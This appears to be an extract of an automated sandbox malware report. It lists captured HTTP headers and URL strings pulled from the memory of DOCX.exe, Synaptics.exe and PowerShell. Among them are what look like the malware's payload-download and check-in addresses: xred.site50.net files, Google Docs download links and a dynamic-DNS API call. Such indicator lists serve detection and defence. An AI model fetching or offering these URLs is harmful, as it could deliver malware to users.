Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4deBDxQUtDgWXzK0M_WECoflzgIOai5h4izv43I5eAKwnaoCMjLOCGgYcRvFq1Saqtm_NvQREContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:42 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-2CMJ0R1bum3m2mY6V8AeBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC73slraXSsMneZHtv5n79LqDHHXgtJeEj55tActabMnTjlv0IK6xwz0DhYDehl7tPwNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:42 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-kYiAOGx2XpXBzkyXtf26sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: svchost.exe, 00000013.00000002.2549394485.000001C97948F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.19.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.19.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.19.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.19.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.19.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.19.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.19.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: DOCX.exe.38.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D
Source: ._cache_DOCX.exe, 0000002E.00000002.2542653625.0000000001211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-score.com/checkip/
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB133F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1313399256.000001FB049B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.fo
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1313399256.000001FB03381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.68.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.1313399256.000001FB04C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
Source: DOCX.exe.38.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: DOCX.exe.38.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: DOCX.exe.38.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar4
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: powershell.exe, 00000009.00000002.1313399256.000001FB03381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/0
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/0e
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/=
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/E
Source: Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/F
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/N0
Source: Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/V
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/e
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/f
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/h
Source: Synaptics.exe, 00000032.00000002.2048410215.000000000823E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0;
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: DOCX.exe.38.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2027640573.00000000046AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2049606347.0000000008EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2047750973.0000000007BFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2038667184.0000000006C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2049117628.000000000887E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2049316395.0000000008AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2051645053.0000000009EFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2050633616.000000000963E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2051769829.000000000A03E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2048191471.0000000007FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2049216473.00000000089BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2038077920.00000000069AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2038869699.0000000006EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2050745200.000000000977E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2044282132.00000000078BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2027495356.000000000440E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2035064455.0000000005AEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2051970508.000000000A2BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2050090710.00000000093BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2037466300.00000000064EE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$o
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$p
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$y
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&xi
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)p
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Mode-
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-UA-WH
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-r
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-uri
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0o
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0y
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1w
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download25920
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3B
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download42Pj9H
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download52
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5H
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5t
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6I
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9r
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:2
Source: Synaptics.exe, 00000032.00000002.2048669891.000000000837E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAB.
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAVTZ:H
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadArch2
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBr=
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadConteH
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDI
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDn
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEv
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF5
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000081C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHH
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadII
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK5
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNx
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOs
Source: Synaptics.exe, 00000032.00000002.2047852007.0000000007D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP5
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP5)
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPn
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPx
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000081C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ.
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQv?
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
Source: Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTo
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTs
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTy
Source: Synaptics.exe, 00000032.00000002.2029741758.0000000005673000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
Source: Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU-uZg
Source: Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
